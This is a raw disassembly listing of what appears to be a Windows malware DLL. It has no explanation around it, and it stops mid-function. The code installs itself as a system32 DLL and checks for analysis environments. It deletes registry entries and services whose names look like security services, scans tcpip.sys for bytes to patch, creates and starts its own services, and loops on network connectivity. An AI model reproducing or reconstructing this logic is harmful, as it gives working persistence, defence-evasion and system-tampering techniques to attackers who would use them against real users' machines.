; sub_9A752A+91�j
lea eax, [ebp+nNumberOfBytesToWrite]
push esi ; lpFileName
push eax ; int
mov [ebp+nNumberOfBytesToWrite], ebx
call sub_9AB76E
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+hMem], eax
jz loc_9A7668
cmp [ebp+nNumberOfBytesToWrite], ebx
jz short loc_9A7613
lea ecx, [ebp+NewFileName]
push ecx ; lpFileName
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push eax ; lpBuffer
call sub_9AB7F5
add esp, 0Ch
test eax, eax
jz short loc_9A7613
cmp [ebp+arg_4], 0FFFFFFFFh
mov [ebp+var_4], 1
jnz short loc_9A7613
push 4 ; dwFlags
push ebx ; lpNewFileName
push esi ; lpExistingFileName
call MoveFileExA
loc_9A7613: ; CODE XREF: sub_9A752A+B9�j
; sub_9A752A+D0�j ...
push [ebp+hMem] ; hMem
call GlobalFree
cmp [ebp+var_4], ebx
jz short loc_9A7668
loc_9A7621: ; CODE XREF: sub_9A752A+9A�j
lea eax, [ebp+NewFileName]
push eax ; lpFileName
call sub_9AB6A9
lea eax, [ebp+NewFileName]
push eax ; lpMultiByteStr
call sub_9AD71D
push edi ; Count
lea eax, [ebp+NewFileName]
push eax ; Source
push esi ; Dest
call strncpy
add esp, 14h
mov ds:byte_9B9F2B, bl
call GetVersion
cmp al, 6
jb short loc_9A7668
push ebx ; int
push offset CommandLine ; lpCommandLine
call sub_9AC2CA
pop ecx
pop ecx
loc_9A7668: ; CODE XREF: sub_9A752A+B0�j
; sub_9A752A+F5�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9A752A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7670 proc near ; CODE XREF: StartAddress+26�p
Buffer = byte ptr -104h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
sldt eax
xor ebx, ebx
cmp ax, bx
jz short loc_9A76C1
cmp [ebp+arg_0], 0FFFFFFFEh
mov esi, offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
jz short loc_9A76B4
push 1F01FFh ; int
push esi ; lpFileName
call sub_9AC163
pop ecx
pop ecx
push 4 ; dwFlags
push ebx ; lpNewFileName
push esi ; lpExistingFileName
call MoveFileExA
loc_9A76A7: ; CODE XREF: sub_9A7670+4F�j
cmp [ebp+arg_0], 0FFFFFFFEh
jz short loc_9A76B4
push esi ; lpFileName
call DeleteFileA
loc_9A76B4: ; CODE XREF: sub_9A7670+1E�j
; sub_9A7670+3B�j
push 1388h ; dwMilliseconds
call Sleep
jmp short loc_9A76A7
; ---------------------------------------------------------------------------
loc_9A76C1: ; CODE XREF: sub_9A7670+13�j
mov esi, 104h
push esi ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call GetSystemDirectoryA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_9A752A
test eax, eax
pop ecx
pop ecx
jnz loc_9A7785
push edi
mov edi, SHGetSpecialFolderPathA
push ebx ; fCreate
push 26h ; csidl
lea eax, [ebp+Buffer]
push eax ; pszPath
push ebx ; hwnd
call edi ; SHGetSpecialFolderPathA
call rand
cdq
push 2
pop ecx
idiv ecx
mov eax, offset Source
test edx, edx
jnz short loc_9A771B
mov eax, offset dword_9A1520
loc_9A771B: ; CODE XREF: sub_9A7670+A4�j
push esi ; Count
push eax ; Source
lea eax, [ebp+Buffer]
push eax ; Dest
call strncat
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
mov [ebp+var_1], bl
call sub_9A752A
add esp, 14h
test eax, eax
jnz short loc_9A7784
push ebx ; fCreate
push 1Ah ; csidl
lea eax, [ebp+Buffer]
push eax ; pszPath
push ebx ; hwnd
call edi ; SHGetSpecialFolderPathA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_9A752A
test eax, eax
pop ecx
pop ecx
jnz short loc_9A7784
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push esi ; nBufferLength
call GetTempPathA
push [ebp+arg_0]
lea eax, [ebp+Buffer]
push eax
call sub_9A752A
pop ecx
pop ecx
loc_9A7784: ; CODE XREF: sub_9A7670+D1�j
; sub_9A7670+F3�j
pop edi
loc_9A7785: ; CODE XREF: sub_9A7670+77�j
pop esi
pop ebx
leave
retn
sub_9A7670 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_9A799E+1FF�o
var_1AC = dword ptr -1ACh
dwFlags = dword ptr -198h
var_194 = dword ptr -194h
WSAData = WSAData ptr -190h
sub esp, 198h
push ebx
push ebp
push esi
push edi
push 8003h ; uMode
call SetErrorMode
call sub_9AB510
call sub_9A722A
xor esi, esi
cmp eax, esi
jge short loc_9A77B5
push eax
call sub_9A7670
pop ecx
loc_9A77B5: ; CODE XREF: StartAddress+23�j
sldt eax
cmp ax, si
jz short loc_9A77C5
push 0FFFFFFFFh ; dwMilliseconds
call Sleep
loc_9A77C5: ; CODE XREF: StartAddress+32�j
call sub_9A7170
call GetVersion
cmp ax, 5
jnz short loc_9A77DD
call sub_9AA5A0
jmp short loc_9A77E2
; ---------------------------------------------------------------------------
loc_9A77DD: ; CODE XREF: StartAddress+4B�j
call sub_9AA56C
loc_9A77E2: ; CODE XREF: StartAddress+52�j
push offset dword_9B9F38
call sub_9A81F5
pop ecx
mov [esp+1A8h+dwFlags], esi
mov [esp+1A8h+var_194], esi
call sub_9A722A
cmp eax, 0FFFFFFFEh
mov edi, offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
jz short loc_9A7811
push 120089h ; int
push edi ; lpFileName
call sub_9AC163
pop ecx
pop ecx
loc_9A7811: ; CODE XREF: StartAddress+79�j
push edi ; lpFileName
push offset nNumberOfBytesToWrite ; int
call sub_9AB76E
cmp eax, esi
pop ecx
pop ecx
mov ds:lpBuffer, eax
jz short loc_9A7858
mov ecx, [eax+3Ch]
add ecx, eax
movzx edx, word ptr [ecx+6]
lea edx, [edx+edx*4]
lea edx, [ecx+edx*8+0F8h]
mov ecx, [edx-18h]
add ecx, [edx-14h]
mov edx, ds:nNumberOfBytesToWrite
cmp edx, ecx
jbe short loc_9A7860
add eax, ecx
sub edx, ecx
mov [esp+1A8h+dwFlags], eax
mov [esp+1A8h+var_194], edx
jmp short loc_9A7860
; ---------------------------------------------------------------------------
loc_9A7858: ; CODE XREF: StartAddress+9C�j
push 0FFFFFFFFh ; dwMilliseconds
call Sleep
loc_9A7860: ; CODE XREF: StartAddress+BF�j
; StartAddress+CD�j
mov ebx, CreateFileA
push esi ; hTemplateFile
push esi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push esi ; lpSecurityAttributes
push 2 ; dwShareMode
mov ebp, 80000000h
push ebp ; dwDesiredAccess
push edi ; lpFileName
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_9A7891
xor eax, eax
push eax ; hTemplateFile
push eax ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push eax ; lpSecurityAttributes
push 3 ; dwShareMode
push ebp ; dwDesiredAccess
push edi ; lpFileName
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A78A8
loc_9A7891: ; CODE XREF: StartAddress+F2�j
xor ebx, ebx
push ebx ; nNumberOfBytesToLockHigh
push ebx ; lpFileSizeHigh
push esi ; hFile
call GetFileSize
push eax ; nNumberOfBytesToLockLow
push ebx ; dwFileOffsetHigh
push ebx ; dwFileOffsetLow
push esi ; hFile
call LockFile
jmp short loc_9A78AA
; ---------------------------------------------------------------------------
loc_9A78A8: ; CODE XREF: StartAddress+106�j
xor ebx, ebx
loc_9A78AA: ; CODE XREF: StartAddress+11D�j
call sub_9A722A
cmp eax, 0FFFFFFFEh
jz short loc_9A78BE
push 20h ; int
push edi ; lpFileName
call sub_9AC163
pop ecx
pop ecx
loc_9A78BE: ; CODE XREF: StartAddress+129�j
push offset ServiceName ; "curityDe"
call sub_9AB558
mov [esp+1ACh+var_1AC], offset aEsstatusw ; "esStatusW"
mov esi, 80000002h
push esi ; hkey
call SHDeleteKeyA
push offset pszValue ; lpServiceName
call sub_9AB558
mov [esp+1ACh+var_1AC], offset aNagerw ; "nagerW"
call sub_9AB558
mov [esp+1ACh+var_1AC], offset dword_9A1598
call sub_9AB558
mov [esp+1ACh+var_1AC], offset dword_9A1584
push offset byte_9A1554 ; pszSubKey
push esi ; hkey
call SHDeleteValueA
push offset dword_9A154C ; lpServiceName
call sub_9AB558
mov [esp+1ACh+var_1AC], offset dword_9A1544
call sub_9AB558
mov esi, Sleep
mov [esp+1ACh+var_1AC], 3A98h
call esi ; Sleep
lea eax, [esp+1A8h+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call WSAStartup
call sub_9AEC54
test eax, eax
jz short loc_9A7967
push [esp+1A8h+var_194]
push [esp+1ACh+dwFlags]
call sub_9AEFDD
pop ecx
pop ecx
call sub_9A89E8
call sub_9ACFCF
loc_9A7967: ; CODE XREF: StartAddress+1C3�j
call sub_9AB2C3
push 1B7740h ; dwMilliseconds
loc_9A7971: ; CODE XREF: StartAddress+213�j
call esi ; Sleep
loc_9A7973: ; CODE XREF: StartAddress+20C�j
push ebx ; dwReserved
lea eax, [esp+1ACh+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz short loc_9A7997
call sub_9ADD9B
push 12h
pop edi
loc_9A798B: ; CODE XREF: StartAddress+20A�j
push 927C0h ; dwMilliseconds
call esi ; Sleep
dec edi
jnz short loc_9A798B
jmp short loc_9A7973
; ---------------------------------------------------------------------------
loc_9A7997: ; CODE XREF: StartAddress+1F8�j
push 0EA60h
jmp short loc_9A7971
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A799E(HMODULE hModule)
sub_9A799E proc near ; CODE XREF: DllMain(x,x,x)+8E�p
Name = byte ptr -210h
var_111 = byte ptr -111h
Str = byte ptr -110h
var_10F = byte ptr -10Fh
var_10 = dword ptr -10h
ThreadId = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hModule = dword ptr 8
push ebp
mov ebp, esp
sub esp, 210h
push ebx
push esi
push edi
push 3Fh
xor eax, eax
xor ebx, ebx
mov [ebp+Str], bl
pop ecx
lea edi, [ebp+var_10F]
rep stosd
stosw
stosb
call sub_9ABFFB
call sub_9AA49F
push 104h ; nSize
mov edi, offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
push edi ; lpFilename
push [ebp+hModule] ; hModule
call GetModuleFileNameA
push 1 ; int
push (offset aUritydescripto+10h) ; lpName
mov ds:byte_9B9F2B, bl
call sub_9AB5DC
pop ecx
pop ecx
lea eax, [ebp+ThreadId]
push eax ; nSize
lea eax, [ebp+Str]
mov esi, 100h
push eax ; lpBuffer
mov [ebp+ThreadId], esi
call GetComputerNameA
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax
lea eax, [ebp+Str]
push eax
call sub_9A8245
mov ds:dword_9B9F34, eax
xor eax, 2F53508Bh
push eax ; Seed
call srand
call rand
push 3
pop ecx
cdq
idiv ecx
add edx, 6
push edx
push offset aMarnwkcw ; "marnwkcw"
call sub_9AB647
call sub_9AB510
push 7
push ds:dword_9B9F34
lea eax, [ebp+Name]
push offset aUritydescripto ; "urityDescriptorDacl"
push esi ; Count
push eax ; Dest
call _snprintf
add esp, 2Ch
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInitialOwner
push ebx ; lpMutexAttributes
mov [ebp+var_111], bl
call CreateMutexA
mov ds:hObject, eax
call GetLastError
mov [ebp+var_8], eax
call GetCommandLineA
mov esi, StrStrIA
push offset Srch
push eax
mov [ebp+var_4], eax
call esi ; StrStrIA
test eax, eax
jz loc_9A7B3A
call sub_9A72CA
cmp [ebp+var_8], 0B7h
mov [ebp+var_10], eax
jz short loc_9A7B14
cmp [ebp+var_8], 5
jz short loc_9A7B14
push ds:hObject ; hObject
call CloseHandle
call sub_9A74E1
test eax, eax
jz short loc_9A7B14
xor edi, edi
loc_9A7AE4: ; CODE XREF: sub_9A799E+174�j
push 0BB8h ; dwMilliseconds
call Sleep
lea eax, [ebp+Name]
push eax ; lpName
push ebx ; bInheritHandle
push 1 ; dwDesiredAccess
call OpenMutexA
test eax, eax
jnz short loc_9A7B14
call GetLastError
cmp eax, 5
jz short loc_9A7B14
inc edi
cmp edi, 3
jl short loc_9A7AE4
loc_9A7B14: ; CODE XREF: sub_9A799E+127�j
; sub_9A799E+12D�j ...
cmp [ebp+var_10], ebx
jz short loc_9A7B20
call sub_9A7410
jmp short loc_9A7B33
; ---------------------------------------------------------------------------
loc_9A7B20: ; CODE XREF: sub_9A799E+179�j
push offset aMarnwkcw ; "marnwkcw"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jnz short loc_9A7B33
call sub_9AB1F2
loc_9A7B33: ; CODE XREF: sub_9A799E+180�j
; sub_9A799E+18E�j
push ebx ; uExitCode
call ExitProcess
; ---------------------------------------------------------------------------
loc_9A7B3A: ; CODE XREF: sub_9A799E+112�j
call GetVersion
cmp ax, 5
jnz short loc_9A7B60
push offset aOwedace ; "owedAce"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B60
call sub_9AA482
call sub_9AA53A
jmp short loc_9A7B88
; ---------------------------------------------------------------------------
loc_9A7B60: ; CODE XREF: sub_9A799E+1A6�j
; sub_9A799E+1B4�j
push offset aIalizeacl ; "ializeAcl"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B75
call sub_9AA482
jmp short loc_9A7B88
; ---------------------------------------------------------------------------
loc_9A7B75: ; CODE XREF: sub_9A799E+1CE�j
push offset aScriptor ; "scriptor"
push [ebp+var_4]
call esi ; StrStrIA
test eax, eax
jz short loc_9A7B88
call sub_9AA4BC
loc_9A7B88: ; CODE XREF: sub_9A799E+1C0�j
; sub_9A799E+1D5�j ...
cmp [ebp+var_8], 0B7h
jz short loc_9A7BB3
cmp [ebp+var_8], 5
jz short loc_9A7BB3
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push ebx ; dwCreationFlags
push ebx ; lpParameter
push offset StartAddress ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
jmp short loc_9A7BC7
; ---------------------------------------------------------------------------
loc_9A7BB3: ; CODE XREF: sub_9A799E+1F1�j
; sub_9A799E+1F7�j
call sub_9A722A
cmp eax, 0FFFFFFFFh
jnz short loc_9A7BC7
push 4 ; dwFlags
push ebx ; lpNewFileName
push edi ; lpExistingFileName
call MoveFileExA
loc_9A7BC7: ; CODE XREF: sub_9A799E+213�j
; sub_9A799E+21D�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A799E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
_DllMain@12 proc near ; CODE XREF: start+4B�p
Name = byte ptr -14h
hModule = dword ptr 8
fdwReason = dword ptr 0Ch
lpvReserved = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
xor ebx, ebx
inc ebx
cmp [ebp+fdwReason], ebx
push esi
push edi
jnz loc_9A7C66
mov edi, [ebp+lpvReserved]
test edi, edi
jz short loc_9A7BEB
mov [ebp+hModule], edi
loc_9A7BEB: ; CODE XREF: DllMain(x,x,x)+1A�j
push [ebp+hModule] ; hLibModule
call DisableThreadLibraryCalls
test edi, edi
jz short loc_9A7C4D
call GetCurrentProcessId
push eax ; Seed
call srand
call rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp+Name]
add edx, 0Ah
push edx
push eax
call sub_9AB647
add esp, 0Ch
lea eax, [ebp+Name]
push eax ; lpName
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
call CreateMutexA
mov esi, eax
test esi, esi
jz short loc_9A7C4D
call GetLastError
cmp eax, 0B7h
jnz short loc_9A7C4D
push esi ; hObject
call CloseHandle
xor eax, eax
jmp short loc_9A7C68
; ---------------------------------------------------------------------------
loc_9A7C4D: ; CODE XREF: DllMain(x,x,x)+2A�j
; DllMain(x,x,x)+67�j ...
call GetVersion
cmp al, 5
jb short loc_9A7C60
push [ebp+hModule] ; hModule
call sub_9A799E
pop ecx
loc_9A7C60: ; CODE XREF: DllMain(x,x,x)+89�j
test edi, edi
jz short loc_9A7C66
xor ebx, ebx
loc_9A7C66: ; CODE XREF: DllMain(x,x,x)+F�j
; DllMain(x,x,x)+96�j
mov eax, ebx
loc_9A7C68: ; CODE XREF: DllMain(x,x,x)+7F�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
_DllMain@12 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7C6F proc near ; CODE XREF: sub_9A7CD0+157�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_9A26A0
call __SEH_prolog
mov edi, ecx
or eax, 0FFFFFFFFh
mov [ebp+var_1C], eax
xor edx, edx
mov [ebp+ms_exc.disabled], edx
loc_9A7C88: ; CODE XREF: sub_9A7C6F+5B�j
mov [ebp+var_20], edx
movzx ecx, word ptr [edi+6]
cmp edx, ecx
jnb short loc_9A7CBA
lea ecx, [edx+edx*4]
lea ecx, [edi+ecx*8+0F8h]
mov esi, [ecx+14h]
cmp [ebp+arg_0], esi
jb short loc_9A7CC9
mov ebx, [ecx+10h]
add ebx, esi
cmp [ebp+arg_0], ebx
jnb short loc_9A7CC9
mov eax, [ecx+0Ch]
sub eax, esi
add eax, [ebp+arg_0]
mov [ebp+var_1C], eax
loc_9A7CBA: ; CODE XREF: sub_9A7C6F+22�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_2
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_9A7CC9: ; CODE XREF: sub_9A7C6F+34�j
; sub_9A7C6F+3E�j
inc edx
jmp short loc_9A7C88
sub_9A7C6F endp
; =============== S U B R O U T I N E =======================================
sub_9A7CCC proc near ; DATA XREF: .text:stru_9A26A0�o
mov eax, [ebp-1Ch]
sub_9A7CCC endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_9A7CD0 proc near ; CODE XREF: sub_9A7E5A+64�p
VersionInformation= _OSVERSIONINFOA ptr -0B4h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
Buf2 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 0B4h
push esi
mov esi, eax
cmp word ptr [esi], 5A4Dh
jnz loc_9A7E52
mov ecx, [ebp+70h+arg_4]
mov eax, [esi+3Ch]
add ecx, 0FFFFFF08h
cmp eax, ecx
jg loc_9A7E52
add eax, esi
cmp dword ptr [eax], 4550h
mov [ebp+70h+var_18], eax
jnz loc_9A7E52
lea eax, [ebp+70h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+70h+VersionInformation.dwOSVersionInfoSize], 9Ch
call GetVersionExA
test eax, eax
jz loc_9A7E52
push ebx
xor ebx, ebx
cmp [ebp+70h+VersionInformation.dwMajorVersion], 5
mov [ebp+70h+var_10], ebx
jnz loc_9A7DB7
mov eax, [ebp+70h+arg_4]
add eax, 0FFFFFFF7h
cmp eax, ebx
mov [ebp+70h+Buf2], 0FFh
mov [ebp+70h+var_3], 0D6h
mov [ebp+70h+var_2], 0C7h
mov [ebp+70h+var_1], 5
mov [ebp+70h+var_14], eax
jbe loc_9A7E4C
loc_9A7D58: ; CODE XREF: sub_9A7CD0+A9�j
push 4 ; Size
lea eax, [ebp+70h+Buf2]
push eax ; Buf2
lea eax, [ebx+esi]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7D75
cmp byte ptr [ebx+esi+8], 0Ah
jz short loc_9A7D80
loc_9A7D75: ; CODE XREF: sub_9A7CD0+9C�j
inc ebx
cmp ebx, [ebp+70h+var_14]
jb short loc_9A7D58
jmp loc_9A7E4C
; ---------------------------------------------------------------------------
loc_9A7D80: ; CODE XREF: sub_9A7CD0+A3�j
cmp ebx, 0FFFFFFFFh
jz loc_9A7E4C
mov eax, [ebp+70h+var_18]
mov esi, [ebx+esi+4]
sub esi, [eax+34h]
cmp esi, [eax+50h]
jnb loc_9A7E4C
mov eax, [ebp+70h+arg_0]
mov [edi], esi
mov [edi+8], eax
mov dword ptr [edi+4], 0Ah
mov [ebp+70h+var_10], 1
jmp loc_9A7E4C
; ---------------------------------------------------------------------------
loc_9A7DB7: ; CODE XREF: sub_9A7CD0+61�j
cmp [ebp+70h+VersionInformation.dwMajorVersion], 6
jnz loc_9A7E4C
cmp [ebp+70h+VersionInformation.dwMinorVersion], ebx
jnz loc_9A7E4C
mov eax, [ebp+70h+arg_4]
add eax, 0FFFFFFEFh
cmp eax, ebx
mov [ebp+70h+var_2], 8Bh
mov [ebp+70h+var_1], 15h
mov [ebp+70h+var_C], 83h
mov [ebp+70h+var_B], 0FAh
mov [ebp+70h+var_A], 0Ah
mov [ebp+70h+var_9], 0Fh
mov [ebp+70h+var_8], 87h
mov [ebp+70h+var_14], eax
jbe short loc_9A7E4C
loc_9A7DF3: ; CODE XREF: sub_9A7CD0+17A�j
push 2 ; Size
lea eax, [ebp+70h+var_2]
push eax ; Buf2
lea eax, [esi+ebx]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7E46
push 5 ; Size
lea eax, [ebp+70h+var_C]
push eax ; Buf2
lea eax, [ebx+esi+6]
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jnz short loc_9A7E46
mov ecx, [ebp+70h+var_18]
lea eax, [ebx+0Bh]
push eax
call sub_9A7C6F
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_9A7E46
and dword ptr [edi+8], 0
mov [edi], eax
mov eax, [ebx+esi+0Bh]
mov [edi+4], eax
mov [ebp+70h+var_10], 1
loc_9A7E46: ; CODE XREF: sub_9A7CD0+137�j
; sub_9A7CD0+14E�j ...
inc ebx
cmp ebx, [ebp+70h+var_14]
jb short loc_9A7DF3
loc_9A7E4C: ; CODE XREF: sub_9A7CD0+82�j
; sub_9A7CD0+AB�j ...
mov eax, [ebp+70h+var_10]
pop ebx
jmp short loc_9A7E54
; ---------------------------------------------------------------------------
loc_9A7E52: ; CODE XREF: sub_9A7CD0+13�j
; sub_9A7CD0+27�j ...
xor eax, eax
loc_9A7E54: ; CODE XREF: sub_9A7CD0+180�j
pop esi
add ebp, 70h
leave
retn
sub_9A7CD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A7E5A proc near ; CODE XREF: sub_9A813F+5A�p
FileName = byte ptr -128h
var_25 = byte ptr -25h
hMem = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 118h
push offset stru_9A26C0
call __SEH_prolog
and [ebp+var_1C], 0
mov esi, 104h
push esi ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call GetSystemDirectoryA
push esi ; Count
push offset aDriversTcpip_s ; "\\drivers\\tcpip.sys"
lea eax, [ebp+FileName]
push eax ; Dest
call strncat
mov [ebp+var_25], 0
lea eax, [ebp+FileName]
push eax ; lpFileName
lea eax, [ebp+var_20]
push eax ; int
call sub_9AB76E
add esp, 14h
mov [ebp+hMem], eax
test eax, eax
jz short loc_9A7EDE
and [ebp+ms_exc.disabled], 0
push [ebp+var_20]
push [ebp+arg_0]
mov edi, [ebp+arg_4]
call sub_9A7CD0
pop ecx
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A7ED1
; ---------------------------------------------------------------------------
loc_9A7ECA: ; DATA XREF: .text:stru_9A26C0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A7ECE: ; DATA XREF: .text:stru_9A26C0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A7ED1: ; CODE XREF: sub_9A7E5A+6E�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push [ebp+hMem] ; hMem
call GlobalFree
loc_9A7EDE: ; CODE XREF: sub_9A7E5A+55�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A7E5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7EE7(LPCSTR lpServiceName)
sub_9A7EE7 proc near ; CODE XREF: sub_9A7FAE+16B�p
ServiceStatus = _SERVICE_STATUS ptr -20h
var_4 = dword ptr -4
lpServiceName = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
xor esi, esi
push 0F003Fh ; dwDesiredAccess
push esi ; lpDatabaseName
push esi ; lpMachineName
mov [ebp+var_4], esi
call OpenSCManagerA
mov ebx, eax
cmp ebx, esi
jz short loc_9A7F41
push edi
push 0F01FFh ; dwDesiredAccess
push [ebp+lpServiceName] ; lpServiceName
push ebx ; hSCManager
call OpenServiceA
mov edi, eax
cmp edi, esi
mov esi, CloseServiceHandle
jz short loc_9A7F3D
lea eax, [ebp+ServiceStatus]
push eax ; lpServiceStatus
push 1 ; dwControl
push edi ; hService
call ControlService
push edi ; hService
mov [ebp+var_4], eax
call DeleteService
push edi ; hSCObject
call esi ; CloseServiceHandle
loc_9A7F3D: ; CODE XREF: sub_9A7EE7+3A�j
push ebx ; hSCObject
call esi ; CloseServiceHandle
pop edi
loc_9A7F41: ; CODE XREF: sub_9A7EE7+1E�j
mov eax, [ebp+var_4]
pop esi
pop ebx
leave
retn
sub_9A7EE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7F48(LPCSTR lpDisplayName, LPCSTR lpBinaryPathName)
sub_9A7F48 proc near ; CODE XREF: sub_9A7FAE+108�p
hSCObject = dword ptr -4
lpDisplayName = dword ptr 8
lpBinaryPathName= dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push 0F003Fh ; dwDesiredAccess
xor esi, esi
push esi ; lpDatabaseName
push esi ; lpMachineName
call OpenSCManagerA
cmp eax, esi
mov [ebp+hSCObject], eax
jz short loc_9A7FA9
push ebx
push edi
push offset Password ; lpPassword
push esi ; lpServiceStartName
push esi ; lpDependencies
push esi ; lpdwTagId
push esi ; lpLoadOrderGroup
push [ebp+lpBinaryPathName] ; lpBinaryPathName
push esi ; dwErrorControl
push 3 ; dwStartType
push 1 ; dwServiceType
push 0F01FFh ; dwDesiredAccess
push [ebp+lpDisplayName] ; lpDisplayName
push [ebp+lpDisplayName] ; lpServiceName
push eax ; hSCManager
call CreateServiceA
mov edi, CloseServiceHandle
mov ebx, eax
cmp ebx, esi
jz short loc_9A7FA2
push esi ; lpServiceArgVectors
push esi ; dwNumServiceArgs
push ebx ; hService
call StartServiceA
push ebx ; hSCObject
mov esi, eax
call edi ; CloseServiceHandle
loc_9A7FA2: ; CODE XREF: sub_9A7F48+4A�j
push [ebp+hSCObject] ; hSCObject
call edi ; CloseServiceHandle
pop edi
pop ebx
loc_9A7FA9: ; CODE XREF: sub_9A7F48+19�j
mov eax, esi
pop esi
leave
retn
sub_9A7F48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A7FAE(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPVOID lpInBuffer)
sub_9A7FAE proc near ; CODE XREF: sub_9A813F+73�p
PathName = byte ptr -234h
var_131 = byte ptr -131h
FileName = byte ptr -130h
ServiceName = byte ptr -2Ch
BytesReturned = dword ptr -0Ch
var_8 = dword ptr -8
hObject = dword ptr -4
lpBuffer = dword ptr 8
nNumberOfBytesToWrite= dword ptr 0Ch
lpInBuffer = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 234h
push ebx
push esi
xor ebx, ebx
push edi
mov [ebp+var_8], ebx
call rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+ServiceName]
add edx, ecx
push edx
push eax
call sub_9AB647
pop ecx
pop ecx
push 104h ; uSize
lea eax, [ebp+PathName]
push eax ; lpBuffer
call GetSystemDirectoryA
mov esi, GetTempFileNameA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push ebx ; uUnique
mov edi, offset PrefixString ; "0"
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_131], bl
call esi ; GetTempFileNameA
test eax, eax
jnz short loc_9A803C
lea eax, [ebp+PathName]
push eax ; lpBuffer
push 104h ; nBufferLength
call GetTempPathA
lea eax, [ebp+FileName]
push eax ; lpTempFileName
push ebx ; uUnique
push edi ; lpPrefixString
lea eax, [ebp+PathName]
push eax ; lpPathName
mov [ebp+var_131], bl
call esi ; GetTempFileNameA
loc_9A803C: ; CODE XREF: sub_9A7FAE+62�j
mov esi, CreateFileA
push ebx ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 6 ; dwShareMode
mov edi, 0C0000000h
push edi ; dwDesiredAccess
lea eax, [ebp+FileName]
